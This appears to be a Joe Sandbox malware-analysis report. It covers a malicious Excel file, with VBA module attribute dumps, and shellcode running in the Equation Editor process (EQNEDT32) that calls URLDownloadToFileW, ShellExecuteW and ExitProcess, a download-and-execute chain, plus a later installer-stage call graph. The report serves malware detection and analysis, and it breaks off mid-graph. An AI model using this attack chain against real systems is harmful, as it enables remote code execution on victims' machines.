                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                              11

                                              Attribute VB_GlobalNameSpace = False

                                              12

                                              Attribute VB_Creatable = False

                                              13

                                              Attribute VB_PredeclaredId = True

                                              14

                                              Attribute VB_Exposed = True

                                              15

                                              Attribute VB_TemplateDerived = False

                                              16

                                              Attribute VB_Customizable = True

                                              17

                                              Attribute VB_Name = "Sheet1"

                                              18

                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                              19

                                              Attribute VB_GlobalNameSpace = False

                                              20

                                              Attribute VB_Creatable = False

                                              21

                                              Attribute VB_PredeclaredId = True

                                              22

                                              Attribute VB_Exposed = True

                                              23

                                              Attribute VB_TemplateDerived = False

                                              24

                                              Attribute VB_Customizable = True

                                              Module: Sheet2

                                              Declaration
                                              LineContent
                                              1

                                              Attribute VB_Name = "Sheet2"

                                              2

                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                              3

                                              Attribute VB_GlobalNameSpace = False

                                              4

                                              Attribute VB_Creatable = False

                                              5

                                              Attribute VB_PredeclaredId = True

                                              6

                                              Attribute VB_Exposed = True

                                              7

                                              Attribute VB_TemplateDerived = False

                                              8

                                              Attribute VB_Customizable = True

                                              9

                                              Attribute VB_Name = "Sheet2"

                                              10

                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                              11

                                              Attribute VB_GlobalNameSpace = False

                                              12

                                              Attribute VB_Creatable = False

                                              13

                                              Attribute VB_PredeclaredId = True

                                              14

                                              Attribute VB_Exposed = True

                                              15

                                              Attribute VB_TemplateDerived = False

                                              16

                                              Attribute VB_Customizable = True

                                              17

                                              Attribute VB_Name = "Sheet2"

                                              18

                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                              19

                                              Attribute VB_GlobalNameSpace = False

                                              20

                                              Attribute VB_Creatable = False

                                              21

                                              Attribute VB_PredeclaredId = True

                                              22

                                              Attribute VB_Exposed = True

                                              23

                                              Attribute VB_TemplateDerived = False

                                              24

                                              Attribute VB_Customizable = True

                                              Module: Sheet3

                                              Declaration
                                              LineContent
                                              1

                                              Attribute VB_Name = "Sheet3"

                                              2

                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                              3

                                              Attribute VB_GlobalNameSpace = False

                                              4

                                              Attribute VB_Creatable = False

                                              5

                                              Attribute VB_PredeclaredId = True

                                              6

                                              Attribute VB_Exposed = True

                                              7

                                              Attribute VB_TemplateDerived = False

                                              8

                                              Attribute VB_Customizable = True

                                              9

                                              Attribute VB_Name = "Sheet3"

                                              10

                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                              11

                                              Attribute VB_GlobalNameSpace = False

                                              12

                                              Attribute VB_Creatable = False

                                              13

                                              Attribute VB_PredeclaredId = True

                                              14

                                              Attribute VB_Exposed = True

                                              15

                                              Attribute VB_TemplateDerived = False

                                              16

                                              Attribute VB_Customizable = True

                                              17

                                              Attribute VB_Name = "Sheet3"

                                              18

                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                              19

                                              Attribute VB_GlobalNameSpace = False

                                              20

                                              Attribute VB_Creatable = False

                                              21

                                              Attribute VB_PredeclaredId = True

                                              22

                                              Attribute VB_Exposed = True

                                              23

                                              Attribute VB_TemplateDerived = False

                                              24

                                              Attribute VB_Customizable = True

                                              Module: ThisWorkbook

                                              Declaration
                                              LineContent
                                              1

                                              Attribute VB_Name = "ThisWorkbook"

                                              2

                                              Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                              3

                                              Attribute VB_GlobalNameSpace = False

                                              4

                                              Attribute VB_Creatable = False

                                              5

                                              Attribute VB_PredeclaredId = True

                                              6

                                              Attribute VB_Exposed = True

                                              7

                                              Attribute VB_TemplateDerived = False

                                              8

                                              Attribute VB_Customizable = True

                                              9

                                              Attribute VB_Name = "ThisWorkbook"

                                              10

                                              Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                              11

                                              Attribute VB_GlobalNameSpace = False

                                              12

                                              Attribute VB_Creatable = False

                                              13

                                              Attribute VB_PredeclaredId = True

                                              14

                                              Attribute VB_Exposed = True

                                              15

                                              Attribute VB_TemplateDerived = False

                                              16

                                              Attribute VB_Customizable = True

                                              17

                                              Attribute VB_Name = "ThisWorkbook"

                                              18

                                              Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                              19

                                              Attribute VB_GlobalNameSpace = False

                                              20

                                              Attribute VB_Creatable = False

                                              21

                                              Attribute VB_PredeclaredId = True

                                              22

                                              Attribute VB_Exposed = True

                                              23

                                              Attribute VB_TemplateDerived = False

                                              24

                                              Attribute VB_Customizable = True

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:26.3%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:73.3%
                                                Total number of Nodes:150
                                                Total number of Limit Nodes:6
                                                execution_graph 464 3540729 GetPEB 465 3540737 464->465 466 354064b 467 354064d 466->467 468 3540652 467->468 484 3540660 LoadLibraryW 467->484 500 354067a 468->500 479 35406f7 ShellExecuteW 539 3540722 479->539 481 354075c 482 3540716 482->481 483 3540725 ExitProcess 482->483 485 3540662 484->485 486 354067a 11 API calls 485->486 487 3540667 486->487 488 35406cf 8 API calls 487->488 489 354068b URLDownloadToFileW 488->489 491 35406e8 5 API calls 489->491 492 35406d8 491->492 493 35406fd 3 API calls 492->493 494 35406ef 493->494 495 35406f7 ShellExecuteW 494->495 497 354075c 494->497 496 3540722 ExitProcess 495->496 498 3540716 496->498 497->468 498->497 499 3540725 ExitProcess 498->499 501 354067d 500->501 502 354068b URLDownloadToFileW 501->502 503 35406cf 8 API calls 501->503 505 35406e8 5 API calls 502->505 503->502 506 35406d8 505->506 507 35406fd 3 API calls 506->507 508 35406ef 507->508 509 35406f7 ShellExecuteW 508->509 511 3540667 508->511 510 3540722 ExitProcess 509->510 512 3540716 510->512 514 35406cf URLDownloadToFileW 511->514 512->511 513 3540725 ExitProcess 512->513 515 35406d8 514->515 516 35406e8 5 API calls 514->516 517 35406fd 3 API calls 515->517 516->515 518 35406ef 517->518 519 35406f7 ShellExecuteW 518->519 521 354068b URLDownloadToFileW 518->521 520 3540722 ExitProcess 519->520 522 3540716 520->522 524 35406e8 521->524 522->521 523 3540725 ExitProcess 522->523 525 35406ea 524->525 526 35406ef 525->526 527 35406fd 3 API calls 525->527 528 35406f7 ShellExecuteW 526->528 530 35406d8 526->530 527->526 529 3540722 ExitProcess 528->529 531 3540716 529->531 533 35406fd 530->533 531->530 532 3540725 ExitProcess 531->532 534 3540700 ShellExecuteW 533->534 535 3540722 ExitProcess 534->535 536 3540716 534->536 535->536 537 35406ef 536->537 538 3540725 ExitProcess 536->538 537->479 537->481 540 3540725 ExitProcess 539->540 541 35405bb ExitProcess 562 35405d4 541->562 545 3540629 546 354067a 11 API calls 545->546 547 3540667 546->547 548 35406cf 8 API calls 547->548 549 354068b URLDownloadToFileW 548->549 551 35406e8 5 API calls 549->551 552 35406d8 551->552 554 35406fd 3 API calls 552->554 553 35405e1 553->545 553->547 602 354064b 553->602 556 35406ef 554->556 557 35406f7 ShellExecuteW 556->557 559 354075c 556->559 558 3540722 ExitProcess 557->558 560 3540716 558->560 560->559 561 3540725 ExitProcess 560->561 563 35405da 562->563 564 35405f0 24 API calls 563->564 571 35405e1 564->571 565 3540629 566 354067a 11 API calls 565->566 567 3540667 566->567 568 35406cf 8 API calls 567->568 569 354068b URLDownloadToFileW 568->569 572 35406e8 5 API calls 569->572 571->565 571->567 575 354064b 18 API calls 571->575 573 35406d8 572->573 574 35406fd 3 API calls 573->574 576 35406ef 574->576 575->565 577 35406f7 ShellExecuteW 576->577 579 35405c7 576->579 578 3540722 ExitProcess 577->578 580 3540716 578->580 579->553 582 35405f0 579->582 580->579 581 3540725 ExitProcess 580->581 583 35405f6 582->583 620 3540617 583->620 585 35406cf 8 API calls 587 354068b URLDownloadToFileW 585->587 590 35406e8 5 API calls 587->590 589 354067a 11 API calls 591 3540667 589->591 592 35406d8 590->592 591->585 593 35406fd 3 API calls 592->593 595 35406ef 593->595 594 354064b 18 API calls 598 3540629 594->598 596 35406f7 ShellExecuteW 595->596 599 354075c 595->599 597 3540722 ExitProcess 596->597 600 3540716 597->600 598->589 599->553 600->599 601 3540725 ExitProcess 600->601 603 354064d 602->603 604 3540652 603->604 605 3540660 15 API calls 603->605 606 354067a 11 API calls 604->606 605->604 607 3540667 606->607 608 35406cf 8 API calls 607->608 609 354068b URLDownloadToFileW 608->609 611 35406e8 5 API calls 609->611 612 35406d8 611->612 613 35406fd 3 API calls 612->613 614 35406ef 613->614 615 35406f7 ShellExecuteW 614->615 617 354075c 614->617 616 3540722 ExitProcess 615->616 618 3540716 616->618 617->545 618->617 619 3540725 ExitProcess 618->619 621 354061a 620->621 622 354064b 18 API calls 621->622 623 3540629 622->623 624 354067a 11 API calls 623->624 625 3540667 624->625 626 35406cf 8 API calls 625->626 627 354068b URLDownloadToFileW 626->627 629 35406e8 5 API calls 627->629 630 35406d8 629->630 631 35406fd 3 API calls 630->631 632 35406ef 631->632 633 35406f7 ShellExecuteW 632->633 635 35405fd 632->635 634 3540722 ExitProcess 633->634 636 3540716 634->636 635->591 635->594 635->598 636->635 637 3540725 ExitProcess 636->637

                                                Callgraph

                                                • Executed
                                                • Not Executed
                                                • Opacity -> Relevance
                                                • Disassembly available
                                                callgraph 0 Function_035405D4 5 Function_035405F0 0->5 9 Function_035406FD 0->9 10 Function_0354067A 0->10 13 Function_03540722 0->13 14 Function_035407A2 0->14 16 Function_035406CF 0->16 19 Function_035406E8 0->19 23 Function_0354064B 0->23 1 Function_035403F4 2 Function_03540116 3 Function_03540556 4 Function_03540617 4->9 4->10 4->13 4->16 4->19 4->23 5->4 5->9 5->10 5->13 5->14 5->16 5->19 5->23 6 Function_03540751 7 Function_03540131 8 Function_035402B2 9->13 10->9 10->13 10->16 10->19 11 Function_035405BB 11->0 11->5 11->9 11->10 11->13 11->16 11->19 11->23 12 Function_03540660 12->9 12->10 12->13 12->16 12->19 15 Function_0354056D 16->9 16->13 16->19 17 Function_035402EF 18 Function_03540028 19->9 19->13 20 Function_03540509 21 Function_03540729 21->6 22 Function_03540069 23->9 23->10 23->12 23->13 23->16 23->19

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 3540660-35406f5 LoadLibraryW call 354067a call 35406cf URLDownloadToFileW call 35406e8 call 35406fd 14 35406f7-3540719 ShellExecuteW call 3540722 0->14 15 354075c-3540768 0->15 17 354076b 14->17 27 354071b 14->27 15->17 18 3540773-3540777 17->18 19 354076d-3540771 17->19 22 354078c-354078e 18->22 23 3540779-354077d 18->23 19->18 21 354077f-3540786 19->21 25 3540788 21->25 26 354078a 21->26 28 354079e-354079f 22->28 23->21 23->22 25->22 29 3540790-3540799 26->29 27->22 30 354071d-3540727 ExitProcess 27->30 33 3540762-3540765 29->33 34 354079b 29->34 33->29 36 3540767 33->36 34->28 36->17
                                                APIs
                                                • LoadLibraryW.KERNEL32(03540652), ref: 03540660
                                                  • Part of subcall function 0354067A: URLDownloadToFileW.URLMON(00000000,0354068B,?,00000000,00000000), ref: 035406D1
                                                  • Part of subcall function 0354067A: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 0354070F
                                                  • Part of subcall function 0354067A: ExitProcess.KERNEL32(00000000), ref: 03540727
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.973646300.0000000003540000.00000004.00000800.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3540000_EQNEDT32.jbxd
                                                Similarity
                                                • API ID: DownloadExecuteExitFileLibraryLoadProcessShell
                                                • String ID:
                                                • API String ID: 2508257586-0
                                                • Opcode ID: 02a2dee4c8732a7e15e4c17dbbbb36d9ea9e33976a4740b631ee41f00cedfad9
                                                • Instruction ID: 5c3ee148dd10b3fd2609992eb9c2c75b322724d5da4e0868704eda23c0794a1a
                                                • Opcode Fuzzy Hash: 02a2dee4c8732a7e15e4c17dbbbb36d9ea9e33976a4740b631ee41f00cedfad9
                                                • Instruction Fuzzy Hash: 41216DB284D3C12FD71797301D6AB55BF246FA3508F6989CEE2830A4E3E6989401CB97
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 37 35405d4-35405e2 call 35407a2 call 35405f0 42 3540635-3540651 37->42 43 35405e5 37->43 47 3540652-3540654 42->47 45 3540656-354065e 43->45 46 35405e7-35405ea 43->46 48 3540662-354066f call 354067a 45->48 46->47 49 35405ed 46->49 47->45 53 3540670-35406f5 call 35406cf URLDownloadToFileW call 35406e8 call 35406fd 48->53 49->48 51 35405ef-35405fe 49->51 51->53 54 3540600-3540605 51->54 71 35406f7-3540719 ShellExecuteW call 3540722 53->71 72 354075c-3540768 53->72 54->53 56 3540607-354060d 54->56 56->48 60 354060f-3540632 call 354064b 56->60 60->42 74 354076b 71->74 84 354071b 71->84 72->74 75 3540773-3540777 74->75 76 354076d-3540771 74->76 79 354078c-354078e 75->79 80 3540779-354077d 75->80 76->75 78 354077f-3540786 76->78 82 3540788 78->82 83 354078a 78->83 85 354079e-354079f 79->85 80->78 80->79 82->79 86 3540790-3540799 83->86 84->79 87 354071d-3540727 ExitProcess 84->87 90 3540762-3540765 86->90 91 354079b 86->91 90->86 93 3540767 90->93 91->85 93->74
                                                APIs
                                                • URLDownloadToFileW.URLMON(00000000,0354068B,?,00000000,00000000), ref: 035406D1
                                                • ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 0354070F
                                                • ExitProcess.KERNEL32(00000000), ref: 03540727
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.973646300.0000000003540000.00000004.00000800.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3540000_EQNEDT32.jbxd
                                                Similarity
                                                • API ID: DownloadExecuteExitFileProcessShell
                                                • String ID:
                                                • API String ID: 3584569557-0
                                                • Opcode ID: 3320bcba38fa063cb6f606931eef2dd3b06928eb0787620feb1c45b37fd53f9a
                                                • Instruction ID: d60a90bafd8f616295f5c2cffa6b0eb50432fc26f78bf95106a7ab00b03c51b2
                                                • Opcode Fuzzy Hash: 3320bcba38fa063cb6f606931eef2dd3b06928eb0787620feb1c45b37fd53f9a
                                                • Instruction Fuzzy Hash: BB41ACB584D3C12FD71A97302D6A655FF247F93108F6D86CE92830B0F3E2589506C796
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 94 35405f0-35405fe call 35407a2 call 3540617 99 3540670-35406f5 call 35406cf URLDownloadToFileW call 35406e8 call 35406fd 94->99 100 3540600-3540605 94->100 121 35406f7-3540719 ShellExecuteW call 3540722 99->121 122 354075c-3540768 99->122 100->99 101 3540607-354060d 100->101 105 3540662-354066f call 354067a 101->105 106 354060f-354065e call 354064b 101->106 105->99 106->105 125 354076b 121->125 137 354071b 121->137 122->125 126 3540773-3540777 125->126 127 354076d-3540771 125->127 131 354078c-354078e 126->131 132 3540779-354077d 126->132 127->126 130 354077f-3540786 127->130 135 3540788 130->135 136 354078a 130->136 138 354079e-354079f 131->138 132->130 132->131 135->131 139 3540790-3540799 136->139 137->131 140 354071d-3540727 ExitProcess 137->140 143 3540762-3540765 139->143 144 354079b 139->144 143->139 146 3540767 143->146 144->138 146->125
                                                APIs
                                                • URLDownloadToFileW.URLMON(00000000,0354068B,?,00000000,00000000), ref: 035406D1
                                                • ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 0354070F
                                                • ExitProcess.KERNEL32(00000000), ref: 03540727
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.973646300.0000000003540000.00000004.00000800.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3540000_EQNEDT32.jbxd
                                                Similarity
                                                • API ID: DownloadExecuteExitFileProcessShell
                                                • String ID:
                                                • API String ID: 3584569557-0
                                                • Opcode ID: 80b1ad9e23ea0a56d06c276fcb09e5d018fbaa1d8f322c6cb7171492dfcef268
                                                • Instruction ID: 2a8c97b8a23b072019b24361cabb0795d79956d6343e4088509fe9743157a58d
                                                • Opcode Fuzzy Hash: 80b1ad9e23ea0a56d06c276fcb09e5d018fbaa1d8f322c6cb7171492dfcef268
                                                • Instruction Fuzzy Hash: 0341BCA644D3C12FD71A97302E6AB55FF24BF93108F6D8ACE92830B0F3D6989505C796
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 147 354067a-3540685 149 354068b-35406f5 URLDownloadToFileW call 35406e8 call 35406fd 147->149 150 3540686 call 35406cf 147->150 157 35406f7-3540719 ShellExecuteW call 3540722 149->157 158 354075c-3540768 149->158 150->149 160 354076b 157->160 170 354071b 157->170 158->160 161 3540773-3540777 160->161 162 354076d-3540771 160->162 165 354078c-354078e 161->165 166 3540779-354077d 161->166 162->161 164 354077f-3540786 162->164 168 3540788 164->168 169 354078a 164->169 171 354079e-354079f 165->171 166->164 166->165 168->165 172 3540790-3540799 169->172 170->165 173 354071d-3540727 ExitProcess 170->173 176 3540762-3540765 172->176 177 354079b 172->177 176->172 179 3540767 176->179 177->171 179->160
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.973646300.0000000003540000.00000004.00000800.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3540000_EQNEDT32.jbxd
                                                Similarity
                                                • API ID: DownloadExecuteExitFileProcessShell
                                                • String ID:
                                                • API String ID: 3584569557-0
                                                • Opcode ID: 9e2844a2488e4e023d4788b719639aedcf1a943f5860e9713c47ba1109e8ef9e
                                                • Instruction ID: 0f1616c7ea230f2a6d447a1bae117742a47b2e57e5a552c07a71529c8d876d7f
                                                • Opcode Fuzzy Hash: 9e2844a2488e4e023d4788b719639aedcf1a943f5860e9713c47ba1109e8ef9e
                                                • Instruction Fuzzy Hash: 91216DA284D3C12ED71797301C6DB55BF646FA3508F6989CEE2C30A4E3E6988401C757
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 180 35406cf-35406d1 URLDownloadToFileW 181 35406d8-35406f5 call 35406fd 180->181 182 35406d3 call 35406e8 180->182 186 35406f7-3540719 ShellExecuteW call 3540722 181->186 187 354075c-3540768 181->187 182->181 189 354076b 186->189 199 354071b 186->199 187->189 190 3540773-3540777 189->190 191 354076d-3540771 189->191 194 354078c-354078e 190->194 195 3540779-354077d 190->195 191->190 193 354077f-3540786 191->193 197 3540788 193->197 198 354078a 193->198 200 354079e-354079f 194->200 195->193 195->194 197->194 201 3540790-3540799 198->201 199->194 202 354071d-3540727 ExitProcess 199->202 205 3540762-3540765 201->205 206 354079b 201->206 205->201 208 3540767 205->208 206->200 208->189
                                                APIs
                                                • URLDownloadToFileW.URLMON(00000000,0354068B,?,00000000,00000000), ref: 035406D1
                                                  • Part of subcall function 035406E8: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 0354070F
                                                  • Part of subcall function 035406E8: ExitProcess.KERNEL32(00000000), ref: 03540727
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.973646300.0000000003540000.00000004.00000800.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3540000_EQNEDT32.jbxd
                                                Similarity
                                                • API ID: DownloadExecuteExitFileProcessShell
                                                • String ID:
                                                • API String ID: 3584569557-0
                                                • Opcode ID: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
                                                • Instruction ID: fa1a5308e493a091ac73bd33789bf1066c8881defea730fd15e1ed18650b5440
                                                • Opcode Fuzzy Hash: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
                                                • Instruction Fuzzy Hash: 7AF0527154C38039E619E3702E4AF59EE28BFC1B48F340889B3030F0F3D88498008A5A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 209 35406fd-354070f ShellExecuteW 211 3540716-3540719 209->211 212 3540711 call 3540722 209->212 214 354076b 211->214 215 354071b 211->215 212->211 216 3540773-3540777 214->216 217 354076d-3540771 214->217 218 354078c-354078e 215->218 219 354071d-3540727 ExitProcess 215->219 216->218 221 3540779-354077d 216->221 217->216 220 354077f-3540786 217->220 222 354079e-354079f 218->222 224 3540788 220->224 225 354078a 220->225 221->218 221->220 224->218 226 3540790-3540799 225->226 229 3540762-3540765 226->229 230 354079b 226->230 229->226 231 3540767 229->231 230->222 231->214
                                                APIs
                                                • ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 0354070F
                                                  • Part of subcall function 03540722: ExitProcess.KERNEL32(00000000), ref: 03540727
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.973646300.0000000003540000.00000004.00000800.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3540000_EQNEDT32.jbxd
                                                Similarity
                                                • API ID: ExecuteExitProcessShell
                                                • String ID:
                                                • API String ID: 1124553745-0
                                                • Opcode ID: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
                                                • Instruction ID: 801ca229bc4037096efb824ac8ea90e748e78a849997108cced168d5aae82a4e
                                                • Opcode Fuzzy Hash: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
                                                • Instruction Fuzzy Hash: 85012B7655434220EB3CE6246B45BB5FB15FB41708FFC8856AB81070F5D168A0C74E5B
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 232 35406e8-35406ea 234 35406ef-35406f5 232->234 235 35406ea call 35406fd 232->235 236 35406f7-3540719 ShellExecuteW call 3540722 234->236 237 354075c-3540768 234->237 235->234 239 354076b 236->239 249 354071b 236->249 237->239 240 3540773-3540777 239->240 241 354076d-3540771 239->241 244 354078c-354078e 240->244 245 3540779-354077d 240->245 241->240 243 354077f-3540786 241->243 247 3540788 243->247 248 354078a 243->248 250 354079e-354079f 244->250 245->243 245->244 247->244 251 3540790-3540799 248->251 249->244 252 354071d-3540727 ExitProcess 249->252 255 3540762-3540765 251->255 256 354079b 251->256 255->251 258 3540767 255->258 256->250 258->239
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.973646300.0000000003540000.00000004.00000800.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3540000_EQNEDT32.jbxd
                                                Similarity
                                                • API ID: ExecuteExitProcessShell
                                                • String ID:
                                                • API String ID: 1124553745-0
                                                • Opcode ID: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
                                                • Instruction ID: 989db728c6de23c23e21ee3f9a08a34b46ef8adc9778a241fdc1dcf0fce79b61
                                                • Opcode Fuzzy Hash: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
                                                • Instruction Fuzzy Hash: 06012B3155434130E76CE2246E85BA9FE85FB8174CFB8485AF3420B0F5C294A4478E1F
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 259 3540722-3540727 ExitProcess
                                                APIs
                                                • ExitProcess.KERNEL32(00000000), ref: 03540727
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.973646300.0000000003540000.00000004.00000800.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3540000_EQNEDT32.jbxd
                                                Similarity
                                                • API ID: ExitProcess
                                                • String ID:
                                                • API String ID: 621844428-0
                                                • Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                • Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
                                                • Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                • Instruction Fuzzy Hash:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 261 3540729-3540734 GetPEB 262 3540737-3540748 call 3540751 261->262 265 354074a-354074e 262->265
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.973646300.0000000003540000.00000004.00000800.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3540000_EQNEDT32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                                • Instruction ID: d9e727dcfea0cdbd732ee6216a362d07c84af5188421cc045bae81acaf1f72f4
                                                • Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                                • Instruction Fuzzy Hash: EBD05E35201502CFD308DB04DA40E52F37AFFC4219B24C264D1004BB69C330E892CA90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 266 35405bb-35405da ExitProcess call 35405d4 269 35405e1-35405e2 266->269 270 35405dc call 35405f0 266->270 271 3540635-3540651 269->271 272 35405e5 269->272 270->269 276 3540652-3540654 271->276 274 3540656-354065e 272->274 275 35405e7-35405ea 272->275 277 3540662-354066f call 354067a 274->277 275->276 278 35405ed 275->278 276->274 282 3540670-35406f5 call 35406cf URLDownloadToFileW call 35406e8 call 35406fd 277->282 278->277 280 35405ef-35405fe 278->280 280->282 283 3540600-3540605 280->283 300 35406f7-3540719 ShellExecuteW call 3540722 282->300 301 354075c-3540768 282->301 283->282 285 3540607-354060d 283->285 285->277 289 354060f-3540632 call 354064b 285->289 289->271 303 354076b 300->303 313 354071b 300->313 301->303 304 3540773-3540777 303->304 305 354076d-3540771 303->305 308 354078c-354078e 304->308 309 3540779-354077d 304->309 305->304 307 354077f-3540786 305->307 311 3540788 307->311 312 354078a 307->312 314 354079e-354079f 308->314 309->307 309->308 311->308 315 3540790-3540799 312->315 313->308 316 354071d-3540727 ExitProcess 313->316 319 3540762-3540765 315->319 320 354079b 315->320 319->315 322 3540767 319->322 320->314 322->303
                                                APIs
                                                • ExitProcess.KERNEL32(035405A9), ref: 035405BB
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.973646300.0000000003540000.00000004.00000800.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3540000_EQNEDT32.jbxd
                                                Similarity
                                                • API ID: ExitProcess
                                                • String ID:
                                                • API String ID: 621844428-0
                                                • Opcode ID: 958262e208b55d661c3b1503d2cfcb295935e557f8728379d0128cc62aa1e079
                                                • Instruction ID: 6314361b880b964c2bd40b70617453fd87355de62743f23d5afa5d3eb7b70bc7
                                                • Opcode Fuzzy Hash: 958262e208b55d661c3b1503d2cfcb295935e557f8728379d0128cc62aa1e079
                                                • Instruction Fuzzy Hash: 6C11D07540E7C18FD30AE7707A6A055FF20B993108B2C86CBC2870B1F3D218964A93D6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Execution Graph

                                                Execution Coverage:22.4%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:19.4%
                                                Total number of Nodes:1571
                                                Total number of Limit Nodes:49
                                                execution_graph 5228 10001000 5231 1000101b 5228->5231 5238 10001516 5231->5238 5233 10001020 5234 10001024 5233->5234 5235 10001027 GlobalAlloc 5233->5235 5236 1000153d 3 API calls 5234->5236 5235->5234 5237 10001019 5236->5237 5240 1000151c 5238->5240 5239 10001522 5239->5233 5240->5239 5241 1000152e GlobalFree 5240->5241 5241->5233 4025 401941 4026 401943 4025->4026 4031 402c53 4026->4031 4032 402c5f 4031->4032 4076 406234 4032->4076 4035 401948 4037 405a03 4035->4037 4116 405cce 4037->4116 4040 405a42 4047 405b62 4040->4047 4130 406212 lstrcpynW 4040->4130 4041 405a2b DeleteFileW 4042 401951 4041->4042 4044 405a68 4045 405a7b 4044->4045 4046 405a6e lstrcatW 4044->4046 4131 405c12 lstrlenW 4045->4131 4048 405a81 4046->4048 4047->4042 4159 406555 FindFirstFileW 4047->4159 4051 405a91 lstrcatW 4048->4051 4054 405a9c lstrlenW FindFirstFileW 4048->4054 4051->4054 4053 405b8b 4162 405bc6 lstrlenW CharPrevW 4053->4162 4054->4047 4061 405abe 4054->4061 4057 405b45 FindNextFileW 4057->4061 4062 405b5b FindClose 4057->4062 4058 4059bb 5 API calls 4060 405b9d 4058->4060 4063 405ba1 4060->4063 4064 405bb7 4060->4064 4061->4057 4072 405b06 4061->4072 4135 406212 lstrcpynW 4061->4135 4062->4047 4063->4042 4067 405371 26 API calls 4063->4067 4066 405371 26 API calls 4064->4066 4066->4042 4069 405bae 4067->4069 4068 405a03 63 API calls 4068->4072 4071 4060b3 39 API calls 